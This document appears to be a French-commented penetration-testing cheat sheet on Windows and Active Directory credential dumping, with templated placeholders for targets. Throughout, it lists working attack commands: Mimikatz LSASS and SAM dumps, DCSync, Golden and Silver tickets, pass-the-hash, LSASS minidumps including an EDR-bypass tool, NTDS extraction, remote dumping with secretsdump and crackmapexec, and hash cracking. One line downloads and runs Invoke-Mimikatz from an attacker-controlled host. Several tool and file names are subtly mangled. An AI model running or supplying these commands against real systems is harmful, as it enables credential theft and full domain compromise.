Credential Dumping

# Lancer (nécessite admin local / SYSTEM)
mimikatz.exe
# Élever les privilèges de debug
privilege::debug
# Dump LSASS — credentials en clair + NTLM hashes
sekurlsa::logonpasswords
# Dump uniquement les hashes NTLM
sekurlsa::msv
# Tickets Kerberos en mémoire
sekurlsa::tickets /export
# Dump SAM (hash des comptes locaux)
lsadump::sam
# Dump LSA secrets (mots de passe services, DPAPI, etc.)
lsadump::secrets
# DCSync — extraire les hashes du DC sans y toucher physiquement
lsadump::dcsync /domain:{{TARGET_DOMAIN}} /all /csv
lsadump::dcsync /domain:{{TARGET_DOMAIN}} /user:krbtgt  # NTLM de krbtgt
lsadump::dcsync /domain:{{TARGET_DOMAIN}} /user:Administrator
# Golden Ticket
kerberos::golden /user:Administrator /domain:{{TARGET_DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{KRBTGT_HASH}} /ptt
# Silver Ticket
kerberos::golden /user:Administrator /domain:{{TARGET_DOMAIN}} /sid:{{DOMAIN_SID}} /target:{{TARGET}} /service:cifs /rc4:{{MACHINE_HASH}} /ptt
# Pass-the-Hash avec Mimikatz
sekurlsa::pth /user:Administrator /ntlm:{{NTLM_HASH}} /domain:{{TARGET_DOMAIN}}

# Invoke-Mimikatz via IEX
IEX (New-Object Net.WebClient).DownloadString('http://{{LHOST}}/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -DumpCreds

# Task Manager — GUI, si accès RDP
# Clic droit sur lsass.exe → Create dump file
# ProcDump (signé Microsoft)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Comsvcs.dll (natif Windows)
$lsassPid = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\lsass.dmp full
# nanodump (EDR bypass)
nanodump.exe --write C:\lsass.dmp
# Analyse offline avec Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# secretsdump — dump à distance (admin requis)
secretsdumppy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}}
secretsdumppy {{TARGET_DOMAIN}}{{USER}}{{TARGET_IP}} -hashes {{NTLM_HASH}}
# DCSync complet depuis Linux
secretsdumppy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}} -just-dc
secretsdumppy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}} -just-dc-ntlm
# Dump SAM et LSA locaux depuis Linux
secretsdumppy -sam SAM -system SYSTEM LOCAL
secretsdumppy -ntds ntdsdit -system SYSTEM LOCAL

# Méthode VSS (Volume Shadow Copy)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\SYSTEM
reg save HKLM\SYSTEM C:\SYSTEM   # alternative
# Ntdsutil (natif)
ntdsutil "activate instance ntds" "ifm" "create full C:\ntds_dump" quit quit
# Analyser offline
secretsdump.py -ntds C:\ntds.dit -system C:\SYSTEM LOCAL

# SAM (admins locaux)
crackmapexec smb {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} --sam
# LSA secrets
crackmapexec smb {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} --lsa
# NTDS (DC seulement)
crackmapexec smb {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} --ntds
# NTDS avec méthode VSS
crackmapexec smb {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} --ntds vss

# Hashcat — NTLM (mode 1000)
hashcat -m 1000 hashestxt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hashestxt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
# Hashcat — NTLMv2 Net-NTLM (mode 5600)
hashcat -m 5600 netntlmv2txt /usr/share/wordlists/rockyou.txt
# John the Ripper — NTLM
john --format=NT hashestxt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack Kerberoast TGS (mode 13100)
hashcat -m 13100 kerberoast_hashestxt /usr/share/wordlists/rockyou.txt
# Crack AS-REP (mode 18200)
hashcat -m 18200 asrep_hashestxt /usr/share/wordlists/rockyou.txt